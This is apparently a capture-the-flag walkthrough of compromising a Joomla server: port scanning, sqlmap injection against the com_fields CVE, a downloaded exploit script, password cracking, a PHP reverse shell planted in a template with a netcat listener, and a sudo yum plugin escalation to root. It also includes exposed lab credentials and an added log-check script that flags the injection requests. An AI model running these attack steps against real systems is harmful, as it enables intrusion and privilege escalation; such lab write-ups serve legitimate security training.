nmap -A -p- -oA output 10.10.126.115 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA dailybugle 10.10.126.115

nmap -sU -O -p- -oA dailybugle-udp 10.10.126.115

nikto -h 10.10.126.115:80

gobuster dir -k -u http://10.10.126.115/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

We check which Joomla version is running:

curl -s http://10.10.126.115/README.txt | head

joomscan --url http://10.10.126.115

This Joomla version appears to have a CVE: https://www.exploit-db.com/exploits/42033

sqlmap -u "http://10.10.126.115/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
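
On the defender side, the com_fields request above stands out in web server logs. Added example (not part of the original write-up): a Python check over constructed access-log lines that flags com_fields modal requests whose list[fullordering] value is not a plain column ordering. The combined log format, the sample lines, the name flag_com_fields_probes and the SAFE_ORDER pattern are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined-log-format line: client IP ... "METHOD target HTTP/x" (assumed format).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate ordering value is a column name plus optional direction.
SAFE_ORDER = re.compile(r'^[A-Za-z_][A-Za-z0-9_.]*( (?:asc|desc))?$', re.I)

def flag_com_fields_probes(lines):
    """Return (client_ip, ordering_value) for suspicious com_fields requests."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        # parse_qs URL-decodes keys and values, so list%5Bfullordering%5D is handled.
        q = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if (q.get("option") == ["com_fields"] and q.get("view") == ["fields"]
                and q.get("layout") == ["modal"]):
            for value in q.get("list[fullordering]", []):
                if not SAFE_ORDER.match(value):
                    hits.append((ip, value))
    return hits

# Constructed sample access-log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/May/2021:09:46:01 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [08/May/2021:09:46:02 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.title%20ASC HTTP/1.1" 200 4312',
    '198.51.100.7 - - [08/May/2021:09:46:05 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml(1,2,3) HTTP/1.1" 500 1780',
    '198.51.100.7 - - [08/May/2021:09:46:06 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT%201) HTTP/1.1" 500 1780',
]

if __name__ == "__main__":
    for ip, value in flag_com_fields_probes(SAMPLE_LOG):
        print(f"suspicious ordering from {ip}: {value!r}")
```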

wget https://raw.githubusercontent.com/stefanlucas/Exploit-Joomla/master/joomblah.py

python joomblah.py http://10.10.126.115

john jonah_user.hash --wordlist=/usr/share/wordlists/rockyou.txt

We go to the administrator page and log in with jonah/spiderman123

We click on index.php

We put the reverse shell code found here into index.php

https://github.com/pentestmonkey/php-reverse-shell

nc -lvnp 5555

We click on Template Preview

ls
ls home
ls /var/www/html

cat /var/www/html/configuration.php

We find the MySQL password

We use the credentials

jjameson/v5uz9r3ZEDzVjNu

We check which OS it is, and it appears to be Red Hat

cat /etc/redhat-release

[jjameson@dailybugle ~]$ TF=$(mktemp -d)
[jjameson@dailybugle ~]$ cat >$TF/x<<EOF
> [main]
> plugins=1
> pluginpath=$TF
> pluginconfpath=$TF
> EOF
[jjameson@dailybugle ~]$ cat >$TF/y.conf<<EOF
> [main]
> enabled=1
> EOF
[jjameson@dailybugle ~]$ cat >$TF/y.py<<EOF
> import os
> import yum
> from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
> requires_api_version='2.1'
> def init_hook(conduit):
>   os.execl('/bin/sh','/bin/sh')
> EOF
[jjameson@dailybugle ~]$ sudo yum -c $TF/x --enableplugin=y
Loaded plugins: y
No plugin match for: y

copyright©2022 Cu3rv0x all rights reserved